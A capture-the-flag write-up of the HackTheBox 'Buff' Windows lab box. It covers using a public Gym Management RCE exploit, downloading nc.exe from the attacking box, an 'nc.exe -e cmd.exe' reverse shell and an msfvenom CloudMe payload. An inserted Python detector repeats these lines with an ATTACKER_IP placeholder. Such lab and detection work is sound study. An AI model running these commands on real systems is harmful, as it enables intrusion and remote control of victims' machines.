HackTheBox – Buff

This is my first HackTheBox writeup, and I decided to write up on the “Buff” box that I did last month. It is a Windows OS machine with a difficulty of “Easy”, so it’s a good starting box for this series.

User Flag:

As always we want to start with an nmap scan to check for open ports/services. The “-sV” flag tells nmap to probe for service versions:

The nmap scan indicates that the host may be blocking ping probes, so we add the “-Pn” flag to the command:

We see that port 8080 is open and is running an Apache web server. We can go ahead and visit that site at

Visiting the home page, it looks like a simple fitness website. The first set of actions I take when I discover a web site:

  1. Check all of the pages and their page sources for anything interesting.
  2. Run a dirbuster scan to find any hidden directories.
  3. Test XSS and SQLi attacks on any input fields we find.
  4. Capture the requests with BurpSuite to see if we can extract any data or manipulate the requests for a possible exploit.

The login fields seemed to be properly sanitized, and the hidden files/directories didn’t lead me anywhere.

While browsing the other pages of the site, I found an empty Contact page:

Definitely a suspicious find, and the only text on the page was “Made using Gym Management Software 1.0.” After a quick search for this on ExploitDB I found this:

According to the exploit, any website using Gym Management System 1.0 could be vulnerable to unauthenticated remote code execution. The script is written for Python 2, so you may have to run it in a virtual environment if you’re having problems with Python 3.

The latest version of Kali already ships this exploit in the exploitdb directory, so all you have to do is copy it to your working directory and run it (the original command had a stray trailing slash after the file name, which makes cp fail):

$ cp /usr/share/exploitdb/exploits/php/webapps/48506.py .
$ python 48506.py

And just like that we have a web shell! The next things I always do when trying to escalate my privileges on a Windows machine are to upload the “nc.exe” and “plink.exe” binaries found in the “windows-binaries” directory on your Kali box. nc.exe is netcat, which lets you upgrade to a better shell, and plink is used to forward ports that are not directly reachable from outside the machine.

Now we just need a way to get those binaries onto the victim machine. A really fast way to do this is to set up a Python SimpleHTTPServer on your host in the directory that holds your binaries, and then download them onto the victim machine with a web request command:

With the webshell we have just created, we can perform an Invoke-WebRequest command to download the binaries onto the victim machine:

C:\xampp\htdocs\gym\upload> Invoke-WebRequest -Uri [attacking box ip]/nc.exe -OutFile "nc.exe"

With netcat successfully downloaded onto the victim machine, we can run a listening netcat connection on our kali box to create a reverse shell:

Then, we run the nc.exe binary we just uploaded to connect back to our listener (the original command put the port after a colon, which netcat does not accept; host and port are separate arguments, and -e hands the connection a cmd.exe):

C:\xampp\htdocs\gym\upload> nc.exe [attacking box ip] 4444 -e cmd.exe

If everything was done correctly, you should have a new shell and be able to use normal cmd/PowerShell commands. While traversing the system directories, I found the user shaun and the user Administrator. Access to Administrator was denied, but I could cd into shaun’s directory; the user flag is on his Desktop. As for the Administrator flag, we will have to dive deeper into the system to find something to exploit.
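As an added defender-side example (not part of the original write-up), here is a small Python detector that runs the post-exploitation commands above, recorded as constructed process-creation events of the kind Sysmon logs (command line plus current directory), through three rules: an executable written by a download cmdlet into the web root, a binary launched from the web root, and netcat handed a command interpreter via -e. The paths are the ones from the write-up; ATTACKER_IP and the sample events are constructed placeholders.

```python
import re
from typing import Dict, List, Tuple

# Web-served directory on the box in the write-up; anything written to or launched from it is suspect.
WEB_ROOTS = ("c:\\xampp\\htdocs",)
DOWNLOADERS = {"invoke-webrequest", "iwr", "curl", "wget"}  # curl/wget are PowerShell aliases of Invoke-WebRequest
NETCATS = {"nc.exe", "nc", "ncat.exe", "ncat", "netcat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell"}

# Constructed sample events: (command line, current directory). ATTACKER_IP is a placeholder.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ('Invoke-WebRequest -Uri http://ATTACKER_IP/nc.exe -OutFile "nc.exe"', r"C:\xampp\htdocs\gym\upload"),
    (r"nc.exe ATTACKER_IP 4444 -e cmd.exe", r"C:\xampp\htdocs\gym\upload"),
    (r"Invoke-WebRequest -Uri https://example.org/a.pdf -OutFile C:\Users\shaun\Downloads\a.pdf", r"C:\Users\shaun"),
    (r"C:\Windows\System32\cmd.exe /c dir C:\Users\shaun\Desktop", r"C:\Users\shaun"),
]

def tokenize(cmd: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole and dropping the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]

def under_web_root(path: str, cwd: str) -> bool:
    """Resolve a relative path against the logged current directory, then test it against the web root."""
    p = path.replace("/", "\\")
    if not re.match(r"^[a-zA-Z]:\\", p):
        p = cwd.rstrip("\\") + "\\" + p  # e.g. bare 'nc.exe' run from the gym upload folder
    return p.lower().startswith(WEB_ROOTS)

def analyze(cmd: str, cwd: str) -> List[str]:
    """Return the detection names that fire for one logged command line (empty list if nothing does)."""
    toks = tokenize(cmd)
    low = [t.lower() for t in toks]
    image = low[0].rsplit("\\", 1)[-1] if low else ""
    findings = []
    # Rule 1: the launched binary itself lives in the web root; cmdlet names are not treated as paths.
    if toks and ("\\" in toks[0] or toks[0].lower().endswith(".exe")) and under_web_root(toks[0], cwd):
        findings.append("process_from_web_root")
    # Rule 2: a download cmdlet writing its -OutFile into the web root, or dropping an executable anywhere.
    if any(t in DOWNLOADERS for t in low) and "-outfile" in low:
        idx = low.index("-outfile")
        out = toks[idx + 1] if idx + 1 < len(toks) else ""
        if out and under_web_root(out, cwd):
            findings.append("download_into_web_root")
        if out.lower().endswith(".exe"):
            findings.append("download_executable")
    # Rule 3: netcat given a command interpreter via -e, the reverse-shell pattern from the write-up.
    if image in NETCATS and "-e" in low:
        nxt = low.index("-e") + 1
        if nxt < len(low) and low[nxt].rsplit("\\", 1)[-1] in SHELLS:
            findings.append("netcat_reverse_shell")
    return findings

def scan(events: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each command line that triggers at least one rule to its list of findings."""
    return {cmd: hits for cmd, cwd in events if (hits := analyze(cmd, cwd))}
```

Running scan(SAMPLE_EVENTS) flags the two commands from the write-up and leaves the PDF download and the directory listing alone; the relative -OutFile only resolves correctly because the log supplies the current directory.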

Administrator/Root Flag:

In the Downloads folder, there is an exe file named Cloudme1.11.2.exe, and the CloudMe service it installs is listening on a local port on the system. With a quick Google search, I found that this version is vulnerable to a buffer overflow. This is where plink.exe comes in: we forward the local port CloudMe listens on to our host machine so that we can reach it with the buffer overflow exploit. Here’s the msfvenom payload I used (the original command omitted the port for nc.exe; it needs the same port your listener is on):

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe [attacking host ip] 4444' -b '\x00\x0a\x0d'

Once the buffer overflow exploit runs with that payload, you will be able to connect to the victim machine as Administrator! Just traverse into the Desktop folder and grab your flag!
